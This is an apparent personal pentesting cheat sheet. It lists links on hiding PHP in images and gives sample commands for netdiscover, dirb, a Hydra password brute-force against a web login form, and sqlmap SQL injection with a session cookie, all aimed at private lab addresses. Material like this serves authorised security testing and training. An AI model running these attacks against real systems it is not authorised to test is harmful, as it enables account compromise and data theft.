# Pentesting
Pentesting is an authorized simulated attack on a computer system, performed to evaluate the security of the system.
# Links
- A Penetration Tester’s Guide to Postgres (opens new window)
- Code injection – a simple PHP virus carried in a JPEG image (opens new window)
- Injecting Malicious PHP In To An Image File : Injection And Execution (opens new window)
# Useful Commands
# Searching a range of IP Address
root@kali:~# netdiscover -i eth2 -r 192.168.0.0/24
Currently scanning: Finished! | Screen View: Unique Hosts
4 Captured ARP Req/Rep packets, from 3 hosts. Total size: 240
_____________________________________________________________________________
IP At MAC Address Count Len MAC Vendor / Hostname
-----------------------------------------------------------------------------
192.168.0.1 f8:1a:67:5a:fe:24 1 60 TP-LINK TECHNOLOGIES CO.,LTD
192.168.0.100 a8:60:b6:3a:56:ce 2 120 Apple, Inc.
192.168.0.101 e0:3f:49:14:a9:0d 1 60 Unknown vendor
1
2
3
4
5
6
7
8
9
10
11
2
3
4
5
6
7
8
9
10
11
# Useful Tools
# DIRB
Searches all the directory contents on a website
# Usage
dirb http://192.168.0.104/ /usr/share/wordlists/dirb/big.txt
1
# Resources
- http://tools.kali.org/web-applications/dirb (opens new window)
- https://github.com/seifreed/dirb (opens new window)
# gobuster
Directory/file & DNS busting tool written in Go.
# Resources
# Hydra
Exploiting Username and Password forms.
# Usage
hydra 192.168.0.104 http-post-form '/imfadministrator/index.php:user=^USER^&pass=^PASS^:Invalid password' -L /root/usernames.txt -P /usr/share/wordlists/metasploit/password.lst -vV -t 10 -w 30 -o hydra-http-post-attack.txt
1
# Resources
- http://insidetrust.blogspot.ca/2011/08/using-hydra-to-dictionary-attack-web.html (opens new window)
- http://tools.kali.org/password-attacks/hydra/ (opens new window)
- https://www.blackmoreops.com/2015/12/23/crack-passwords-in-kali-linux-with-hydra/ (opens new window)
# sqlmap
Used for doing SQL injection stuff.
# Usage
When having to log into an PHPSESSIONID auth:
sqlmap -u http://192.168.0.104/imfadministrator/cms.php?pagename=upload --banner --cookie="PHPSESSID=m0i2uapvsqlklug2tpe2a8cis2; security=low" -f
1
← ⬅️ Lists Metasploit →